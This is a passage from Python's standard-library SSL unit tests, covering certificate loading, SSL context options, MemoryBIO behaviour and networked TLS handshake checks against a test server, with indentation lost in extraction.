ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(remote)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
class NetworkedBIOTests(unittest.TestCase):
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_handshake(self):
with support.transient_internet(REMOTE_HOST):
sock = socket.socket(socket.AF_INET)
sock.connect((REMOTE_HOST, 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(REMOTE_ROOT_CERT)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, REMOTE_HOST)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# self-signed.pythontest.net probably shuts down the TCP
# connection without sending a secure shutdown message, and
# this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
sock.close()
def test_read_write_data(self):
with support.transient_internet(REMOTE_HOST):
sock = socket.socket(socket.AF_INET)
sock.connect((REMOTE_HOST, 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'GET / HTTP/1.0\r\n\r\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf[:5], b'HTTP/')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
sock.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
